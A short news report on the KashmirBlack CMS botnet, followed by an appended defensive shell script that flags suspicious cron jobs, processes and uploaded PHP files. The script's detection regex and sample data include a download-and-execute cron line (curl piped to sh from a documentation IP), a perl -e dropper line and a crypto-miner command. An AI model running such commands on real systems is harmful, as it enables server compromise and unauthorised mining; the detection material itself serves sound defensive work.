June 5, 2023

A highly sophisticated botnet, named KashmirBlack, is believed to have infected hundreds of thousands of websites by attacking their underlying CMS platforms, according to US-based cyber security firm Imperva. The main victims are sites running Drupal, WordPress and their counterparts.

The botnet’s prime purpose appears to be infecting websites and then using their servers for cryptocurrency mining.

The hackers behind it are based in Indonesia, where the botnet’s command-and-control (C&C) infrastructure is hosted.

The botnet is the work of a hacker named “Exect1337”, a member of the Indonesian hacker crew PhantomGhost.

“The KashmirBlack C&C has three main roles: Supply a Perl script that infects the victim server with the botnet malicious script, receive reports of findings and attack results from bots and supply bots with attack instructions.” Most of the victim sites are in the US.

The KashmirBlack C&C has a scanner that searches for sites running CMS platforms, creates an attack instruction for each newly found site, and pushes it into a queue from which bots pick up the instructions and attack.

The team found more than 20 distinct exploits.

The team advised several actions that should be performed in case your server is infected by the KashmirBlack botnet.

“Kill malicious processes, remove malicious files, remove suspicious and unfamiliar jobs and remove unused plugins and themes”.

The site administrator should ensure the CMS core files and third-party modules are always up-to-date and properly configured.

“Strong and unique passwords are recommended, as they are the first defence against brute force attacks.”
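The remediation advice above (kill malicious processes, remove malicious files and unfamiliar jobs, remove unused plugins and themes) presupposes that an administrator can first find them. As an added example, not from the article or from Imperva’s report, here is a small read-only triage helper in POSIX sh that flags cron entries, processes and files matching the behaviours the article describes (a Perl dropper, download-and-execute one-liners, a crypto-miner) so they can be reviewed before anything is removed. The regular expression, the 80% CPU threshold, the function names and the sample crontab and `ps` output are all constructed for illustration; the IP addresses are RFC 5737 documentation addresses.

```shell
#!/bin/sh
# Added example (not from the article or Imperva's report): a read-only
# triage helper for a web server suspected of a KashmirBlack-style infection.
# It only prints candidates for review; it never kills or deletes anything.

# Constructed patterns typical of web-shell / miner persistence: Perl
# one-liners, curl/wget piped straight into a shell, base64-decoded payloads,
# binaries living in /tmp or /dev/shm, and common miner names / pool URLs.
SUSPICIOUS_CMD_RE='perl -e|curl [^|]*[|] *(ba)?sh|wget [^|]*[|] *(ba)?sh|base64 (-d|--decode)|/tmp/|/dev/shm/|xmrig|minerd|stratum[+]tcp'

# flag_cron: read crontab lines on stdin (e.g. from `crontab -l`), drop
# comments, print the entries that match the patterns above.
flag_cron() {
    grep -v '^[[:space:]]*#' | grep -E "$SUSPICIOUS_CMD_RE" || true
}

# flag_procs: read `ps -eo pid,user,pcpu,args` output on stdin and print
# processes that match the patterns or use more than 80% CPU (assumed
# threshold), a typical sign of a crypto-miner. The header line is skipped.
flag_procs() {
    awk -v re="$SUSPICIOUS_CMD_RE" 'NR > 1 && ($3 + 0 > 80 || $0 ~ re)'
}

# php_in_uploads: list PHP files under a CMS uploads directory, which should
# only ever contain media. Any hit here is worth a look.
php_in_uploads() {
    find "$1" -type f -name '*.php' 2>/dev/null
}

# --- Constructed sample input, standing in for a live host -------------------
SAMPLE_CRON='# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://203.0.113.10/x.sh | sh
@reboot perl -e "system(q(/tmp/.p/run))" >/dev/null 2>&1
30 2 * * 0 /usr/local/bin/backup.sh'

SAMPLE_PS='PID USER %CPU COMMAND
  1 root 0.0 /sbin/init
812 www-data 0.3 php-fpm: pool www
941 www-data 97.8 /tmp/.cache/xmrig -o stratum+tcp://203.0.113.20:3333'

echo "== cron entries worth a closer look =="
printf '%s\n' "$SAMPLE_CRON" | flag_cron        # 2 entries: the curl|sh and perl -e lines

echo "== processes worth a closer look =="
printf '%s\n' "$SAMPLE_PS" | flag_procs         # 1 process: the miner in /tmp

# Constructed uploads tree: one image (fine) and one hidden PHP file (not fine).
tmp=$(mktemp -d)
mkdir -p "$tmp/uploads/2023/06"
: > "$tmp/uploads/2023/06/photo.jpg"
: > "$tmp/uploads/2023/06/.cache.php"
echo "== PHP files inside the uploads tree =="
php_in_uploads "$tmp/uploads"                    # 1 path: the .cache.php file
rm -rf "$tmp"
```

On a live host, feed real data instead of the samples: `crontab -l` for each user (and the files under /etc/cron.d) into `flag_cron`, `ps -eo pid,user,pcpu,args` into `flag_procs`, and the CMS upload directory (for WordPress, wp-content/uploads) into `php_in_uploads`. Everything printed is a candidate for review, not a verdict: a legitimate backup job that decodes base64 will match too, which is why the script leaves the decision, and the removal, to the administrator.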
